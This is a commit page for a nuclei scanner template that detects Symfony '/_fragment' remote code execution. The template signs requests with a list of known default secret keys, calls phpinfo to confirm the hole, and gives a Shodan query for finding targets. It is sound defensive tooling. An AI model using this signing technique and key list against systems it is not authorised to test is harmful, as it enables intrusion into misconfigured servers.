Create symfony-default-key-rce (#7642)

* Create symfony-default-key-rce Add check for common symfony default key for easy RCE * Update symfony-default-key-rce Fix janky formatting from linter * added additional secretkey * moving templates around --------- Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com>
projectdiscovery · Dec 28, 2024 · 603677d · 603677d
1 parent f94f6ea
commit 603677d
Show file tree

Hide file tree

Showing 4 changed files with 66 additions and 0 deletions.
diff --git a/http/misconfiguration/symfony-debug.yaml → ...sconfiguration/symfony/symfony-debug.yaml b/http/misconfiguration/symfony-debug.yaml → ...sconfiguration/symfony/symfony-debug.yaml
diff --git a/http/misconfiguration/symfony/symfony-default-key-rce.yaml b/http/misconfiguration/symfony/symfony-default-key-rce.yaml
@@ -0,0 +1,66 @@
+id: symfony-rce
+
+info:
+  name: Symfony _fragment - Default Key RCE
+  author: Yablargo
+  severity: critical
+  description: |
+    Symfony servers support a "/_fragment" command that allows clients to provide custom PHP commands and return the HTML output.
+    This template checks to see if they also use a popular default secret key for remote command execution.
+  reference: |
+    https://portswigger.net/daily-swig/symfony-based-websites-open-to-rce-attack-research-finds
+    https://medium.com/@m4cddr/how-i-got-rce-in-10-websites-26dd87441f22
+    https://al1z4deh.medium.com/how-i-hacked-28-sites-at-once-rce-5458211048d5
+    https://github.com/ambionics/symfony-exploits
+  metadata:
+    max-request: 12
+    shodan-query: http.html:"Symfony Profiler"
+    verified: true
+  tags: rce,symfony,misconfig
+
+variables:
+  badsecretkey: 'ThisIsAlmostCertainlyNotIt'
+  uri_part: '_fragment?_path=what%3D-1%26_controller%3Dphpinfo'
+
+flow: http(1) && http(2)
+
+http:
+  - method: GET
+    path:
+      - '{{BaseURL}}/{{uri_part}}&_hash={{url_encode(base64(hex_decode(hmac("sha256","{{BaseURL}}/{{uri_part}}",badsecretkey))))}}'
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "status_code == 403"
+          - "contains(body, 'symfony')"
+        condition: and
+        internal: true
+
+  - method: GET
+    path:
+      - '{{BaseURL}}/{{uri_part}}&_hash={{url_encode(base64(hex_decode(hmac("sha256","{{BaseURL}}/{{uri_part}}",secretkey))))}}'
+
+    payloads:
+      secretkey:
+        - ThisTokenIsNotSoSecretChangeIt
+        - ThisEzPlatformTokenIsNotSoSecret_PleaseChangeIt
+        - xxxxxxxaxaxaxa
+        - 97829395eda62d81f37980176ded371a
+        - YOUR_APP_SECRET
+        - 879a6adeceeccbdc835a19f7e3aad7e8
+        - some_new_secret_123
+        - f96c2d666ace1278ec4c9e2304381bc3
+        - 7d41a4acde33432b1d51eae15a301550
+        - 236cd9304bb88b11e2bb4d56108dffa8
+        - 8cfa2bd0b50b7db00e9c186be68f7ce7465123
+
+    matchers-condition: and
+    matchers:
+      - type: dsl
+        dsl:
+          - "status_code == 200"
+          - "contains(body, 'PHP Version')"
+          - "contains(body, 'PHP License')"
+          - "contains(body, 'symfony')"
+        condition: and
diff --git a/...iguration/symfony-fosjrouting-bundle.yaml → ...n/symfony/symfony-fosjrouting-bundle.yaml b/...iguration/symfony-fosjrouting-bundle.yaml → ...n/symfony/symfony-fosjrouting-bundle.yaml
diff --git a/http/misconfiguration/symfony-fragment.yaml → ...nfiguration/symfony/symfony-fragment.yaml b/http/misconfiguration/symfony-fragment.yaml → ...nfiguration/symfony/symfony-fragment.yaml